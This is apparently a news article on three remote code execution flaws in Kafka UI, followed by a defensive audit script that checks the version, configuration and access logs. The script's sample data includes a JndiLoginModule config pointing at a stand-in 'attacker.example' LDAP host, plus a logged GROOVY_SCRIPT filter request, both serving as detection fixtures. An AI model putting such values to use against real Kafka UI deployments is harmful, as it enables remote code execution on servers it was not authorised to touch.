Peter Zhang
Jul 22, 2024 15:37
Researchers have identified three critical remote code execution (RCE) vulnerabilities in Kafka UI. Users are advised to upgrade to version 0.7.2 to mitigate the risk.
Researchers have uncovered three critical remote code execution (RCE) vulnerabilities in Kafka UI, an open source web application used for managing and monitoring Apache Kafka clusters, according to The GitHub Blog. All three have been addressed in the latest release, version 0.7.2, and users are strongly encouraged to update their deployments to close off these attack paths.
CVE-2023-52251: RCE via Groovy Script Execution
The first vulnerability, tracked as CVE-2023-52251, abuses the message filtering feature in Kafka UI. An attacker can select the GROOVY_SCRIPT filter type and have the server execute an arbitrary Groovy script, which amounts to RCE. Because the filter can be triggered with a single HTTP GET request, the issue is easy to reach for anyone who can talk to the Kafka UI endpoint. The vulnerability was reported in November 2023 and patched in April 2024.
CVE-2024-32030: RCE via JMX Connector
The second vulnerability, CVE-2024-32030, involves the Java Management Extensions (JMX) connector that Kafka UI uses to monitor Kafka brokers. If the dynamic.config.enabled setting is turned on, an attacker can reconfigure Kafka UI to connect to a JMX server they control, and the resulting deserialization of attacker-supplied data leads to RCE. This vulnerability was also fixed in the 0.7.2 release.
CVE-2023-25194: RCE via JndiLoginModule
The third vulnerability, CVE-2023-25194, abuses the JndiLoginModule used for authentication. An attacker can manipulate cluster properties to trigger RCE. As with the JMX issue, this is only exploitable if the dynamic.config.enabled property is set to true. The fix, included in the 0.7.2 release, prohibits use of the JndiLoginModule.
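The three findings share a small set of preconditions that can be checked before an upgrade window: the running version, whether dynamic.config.enabled is on, whether any cluster's SASL properties reference a JndiLoginModule, and whether the access log already shows GET requests carrying the GROOVY_SCRIPT filter type. The script below is an added example for this article; it is not code from the Kafka UI project or from the GitHub Blog post. The environment variable name DYNAMIC_CONFIG_ENABLED, the property key sasl.jaas.config, the access-log layout and the filterQueryType parameter, and all sample data are assumptions constructed for the example.

```python
"""Pre-upgrade audit for the three Kafka UI RCE findings described above.

Added example, not the Kafka UI project's code. It checks the conditions the
advisory names: a version older than 0.7.2, dynamic.config.enabled turned on
(precondition for CVE-2024-32030 and CVE-2023-25194), a JndiLoginModule in a
cluster's SASL JAAS config (CVE-2023-25194), and GET requests that carry the
GROOVY_SCRIPT filter type (CVE-2023-52251).

Assumptions: the DYNAMIC_CONFIG_ENABLED variable, the sasl.jaas.config key,
the log line format and the filterQueryType parameter are constructed here.
"""
import re
from urllib.parse import unquote

FIXED_VERSION = (0, 7, 2)
VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)")
# Request target of a GET line in the constructed combined-log-style format.
GET_RE = re.compile(r'"GET\s+(\S+)')


def parse_version(text):
    """Extract a (major, minor, patch) tuple from strings like 'v0.7.1'."""
    m = VERSION_RE.search(text)
    if not m:
        raise ValueError(f"no semantic version in {text!r}")
    return tuple(int(x) for x in m.groups())


def is_vulnerable_version(text):
    """True for any release before 0.7.2, the version that carries the fixes."""
    return parse_version(text) < FIXED_VERSION


def dynamic_config_enabled(env):
    # Assumption: dynamic.config.enabled is surfaced as DYNAMIC_CONFIG_ENABLED.
    return env.get("DYNAMIC_CONFIG_ENABLED", "false").strip().lower() == "true"


def groovy_filter_requests(log_lines):
    """Return GET targets that mention the GROOVY_SCRIPT filter type.

    The target is percent-decoded first so that an encoded variant such as
    GROOVY%5FSCRIPT does not slip past a plain substring match.
    """
    hits = []
    for line in log_lines:
        m = GET_RE.search(line)
        if m and "GROOVY_SCRIPT" in unquote(m.group(1)).upper():
            hits.append(m.group(1))
    return hits


def audit(version, env, clusters, log_lines):
    """Collect human-readable findings; an empty list means nothing to act on."""
    findings = []
    if is_vulnerable_version(version):
        findings.append(f"version {version} < 0.7.2: upgrade (all three CVEs)")
    if dynamic_config_enabled(env):
        findings.append("dynamic.config.enabled=true: precondition for "
                        "CVE-2024-32030 and CVE-2023-25194")
    for name, props in clusters.items():
        if "JndiLoginModule" in props.get("sasl.jaas.config", ""):
            findings.append(f"cluster {name}: JndiLoginModule in "
                            "sasl.jaas.config (CVE-2023-25194)")
    for target in groovy_filter_requests(log_lines):
        findings.append(f"GROOVY_SCRIPT filter request seen: {target} "
                        "(CVE-2023-52251)")
    return findings


# Constructed sample input for a stand-alone run.
SAMPLE_ENV = {"DYNAMIC_CONFIG_ENABLED": "true"}
SAMPLE_CLUSTERS = {
    "prod": {"sasl.jaas.config":
             'com.sun.security.auth.module.JndiLoginModule required '
             'user.provider.url="ldap://attacker.example:1389/x";'},
    "dev": {"sasl.jaas.config":
            'org.apache.kafka.common.security.plain.PlainLoginModule required '
            'username="u" password="p";'},
}
SAMPLE_LOG = [
    '10.0.0.5 - - [22/Jul/2024:15:37:00 +0000] "GET /api/clusters/prod/topics/'
    'orders/messages?filterQueryType=GROOVY%5FSCRIPT&q=x HTTP/1.1" 200 512',
    '10.0.0.6 - - [22/Jul/2024:15:38:00 +0000] "GET /api/clusters/prod/topics '
    'HTTP/1.1" 200 120',
    '10.0.0.7 - - [22/Jul/2024:15:39:00 +0000] "POST /api/clusters/prod/topics/'
    'orders/messages HTTP/1.1" 201 10',
]

if __name__ == "__main__":
    for finding in audit("0.7.1", SAMPLE_ENV, SAMPLE_CLUSTERS, SAMPLE_LOG):
        print(finding)
```

Run against the constructed data the script reports four findings: the old version, the dynamic config flag, the JndiLoginModule in the prod cluster, and the percent-encoded GROOVY_SCRIPT request; the dev cluster, which uses PlainLoginModule, and the plain topic listing are left alone. Note that the log check only shows that the filter was invoked, not whether the script was hostile, so treat it as a prompt to review the request body and the calling identity rather than as a confirmed compromise.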
Kafka UI users are advised to upgrade to version 0.7.2 to protect their deployments against these critical vulnerabilities. The fixes include updated dependencies and stricter controls on the affected features to prevent exploitation.